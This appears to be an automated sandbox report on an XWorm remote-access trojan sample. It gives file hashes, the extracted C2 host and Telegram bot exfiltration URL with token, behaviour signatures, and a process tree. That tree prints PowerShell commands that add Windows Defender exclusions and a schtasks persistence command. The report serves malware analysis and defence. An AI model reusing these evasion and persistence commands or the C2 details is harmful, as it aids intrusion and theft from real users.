Analysis
-
max time kernel
36s -
max time network
44s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2024 19:13
Static task
static1
Behavioral task
behavioral1
Sample
22Executor (1).exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
22Executor (1).exe
Resource
win10v2004-20240226-en
General
-
Target
22Executor (1).exe
-
Size
14.3MB
-
MD5
2f6ccdc5a983127eb4619c0131b22f74
-
SHA1
ea606124c913238a1cd06ed46cf297467634745a
-
SHA256
404a515445e44719d42c8689968c39b4903d9fb65bab7624cd14a943b7809ae8
-
SHA512
97ebbd6814cc8451ed14f573bcf9d81f025e2a127df71f6632eece8886952edda5ed075a48f88e859a044c6070bfd64035922ff171689df8b3f6428813d1c9a1
-
SSDEEP
1536:efT1xxuiGO+oS2tXFlGXyjXnq7CkHOHmvkKUUgFv2qsFjAk1CortszhXXIX8xe2X:G2HoZXFlAyjrkHOHRFsFcGtsz1ef29d
Malware Config
Extracted
xworm
tr3.localto.net:44953
-
Install_directory
%ProgramData%
-
install_file
svchhost.exe
-
telegram
https://api.telegram.org/bot6919369290:AAGnnKr1Yo67mV9jYUriuVi-XAno2tdvbq0/sendMessage?chat_id=6340808873
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe family_xworm behavioral2/memory/2436-47-0x0000000000030000-0x000000000004C000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3564 powershell.exe 4012 powershell.exe 3356 powershell.exe 1504 powershell.exe 2768 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
22Exe.exe22Executor (1).exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation 22Exe.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation 22Executor (1).exe -
Drops startup file 4 IoCs
Processes:
22Executor (1).exe22Exe.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe 22Executor (1).exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe 22Executor (1).exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk 22Exe.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk 22Exe.exe -
Executes dropped EXE 2 IoCs
Processes:
22.exe22Exe.exepid process 2188 22.exe 2436 22Exe.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
22Exe.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchhost = "C:\\ProgramData\\svchhost.exe" 22Exe.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3396 2188 WerFault.exe 22.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
22Exe.exepid process 2436 22Exe.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe22Exe.exepid process 3564 powershell.exe 3564 powershell.exe 4012 powershell.exe 4012 powershell.exe 4012 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 1504 powershell.exe 1504 powershell.exe 1504 powershell.exe 2768 powershell.exe 2768 powershell.exe 2768 powershell.exe 2436 22Exe.exe 2436 22Exe.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exe22Exe.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 2436 22Exe.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 2436 22Exe.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
22Exe.exepid process 2436 22Exe.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
22Executor (1).exe22Exe.exedescription pid process target process PID 332 wrote to memory of 2188 332 22Executor (1).exe 22.exe PID 332 wrote to memory of 2188 332 22Executor (1).exe 22.exe PID 332 wrote to memory of 2188 332 22Executor (1).exe 22.exe PID 332 wrote to memory of 3564 332 22Executor (1).exe powershell.exe PID 332 wrote to memory of 3564 332 22Executor (1).exe powershell.exe PID 332 wrote to memory of 2436 332 22Executor (1).exe 22Exe.exe PID 332 wrote to memory of 2436 332 22Executor (1).exe 22Exe.exe PID 2436 wrote to memory of 4012 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 4012 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 3356 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 3356 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 1504 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 1504 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 2768 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 2768 2436 22Exe.exe powershell.exe PID 2436 wrote to memory of 4628 2436 22Exe.exe schtasks.exe PID 2436 wrote to memory of 4628 2436 22Exe.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe"C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 10483⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22Exe.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchhost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchhost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchhost" /tr "C:\ProgramData\svchhost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2188 -ip 21881⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52d6baabb78161c2401e97f08de1b3b4e
SHA17bd22cebd5f310d8ac2ef8027caf6a0ec3bf709e
SHA2561cea816e9897ec6852edb3671e5a93b05ea817bc969c4d47ee70f5573f95df42
SHA5129f35b70cdb0159002143296f11dd22bec6e28836d36bb2ec0527692935cfc3f43df54871a9397bbdf2aaf6912943968310320433ca51a39e360d7227262c754c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD583685d101174171875b4a603a6c2a35c
SHA137be24f7c4525e17fa18dbd004186be3a9209017
SHA2560c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5c08aea9c78561a5f00398a723fdf2925
SHA12c880cbb5d02169a86bb9517ce2a0184cb177c6e
SHA25663d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7
SHA512d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c
-
C:\Users\Admin\AppData\Local\Temp\22.exeFilesize
53KB
MD526f0ceb6deadcade5fc0f8c407039d85
SHA140c28e32bcb62ed98d91344b6bb202aee3b45a96
SHA256aa084872bd13860993b33d46aa7285e1828d3139aba727a644a93d519491f18f
SHA51271683db2320e0a6c73cbffc1855c1345ced2bbc0a44feeb0e0372ee184e57208a47d896de3b14a18fcaacd1ec9a632052074ffcf6a483f06e07a7650cffc4181
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0esvl4a5.el0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exeFilesize
89KB
MD5a748f90b8a2ae76abca49e988f684448
SHA14fdb6d05574d6da4dec15c532ab773e2b6edcaf6
SHA256d0928439360838dfdbfefe96ef20922518ee0a9224ad17372587dce5894df41a
SHA5126401b64a363a40d11317d33aa0aed26c6a6a191661e6eadc653b2b4deef24120b715bc83748d4f41ff3afbb145c466898b74cc252c6fb2dadc8dbb1b36f83bb2
-
memory/332-3-0x000000001B530000-0x000000001B5D6000-memory.dmpFilesize
664KB
-
memory/332-2-0x00007FFA05FC0000-0x00007FFA06961000-memory.dmpFilesize
9.6MB
-
memory/332-1-0x00007FFA05FC0000-0x00007FFA06961000-memory.dmpFilesize
9.6MB
-
memory/332-49-0x00007FFA05FC0000-0x00007FFA06961000-memory.dmpFilesize
9.6MB
-
memory/332-0-0x00007FFA06275000-0x00007FFA06276000-memory.dmpFilesize
4KB
-
memory/2188-32-0x0000000000DA0000-0x0000000000DB4000-memory.dmpFilesize
80KB
-
memory/2188-35-0x0000000005DD0000-0x0000000006374000-memory.dmpFilesize
5.6MB
-
memory/2188-48-0x0000000005820000-0x00000000058B2000-memory.dmpFilesize
584KB
-
memory/2188-50-0x00000000057C0000-0x00000000057CA000-memory.dmpFilesize
40KB
-
memory/2436-47-0x0000000000030000-0x000000000004C000-memory.dmpFilesize
112KB
-
memory/3564-31-0x00007FFA036C0000-0x00007FFA04181000-memory.dmpFilesize
10.8MB
-
memory/3564-28-0x00007FFA036C0000-0x00007FFA04181000-memory.dmpFilesize
10.8MB
-
memory/3564-27-0x00007FFA036C0000-0x00007FFA04181000-memory.dmpFilesize
10.8MB
-
memory/3564-26-0x00007FFA036C0000-0x00007FFA04181000-memory.dmpFilesize
10.8MB
-
memory/3564-25-0x000001B8B9730000-0x000001B8B9752000-memory.dmpFilesize
136KB
-
memory/3564-14-0x00007FFA036C3000-0x00007FFA036C5000-memory.dmpFilesize
8KB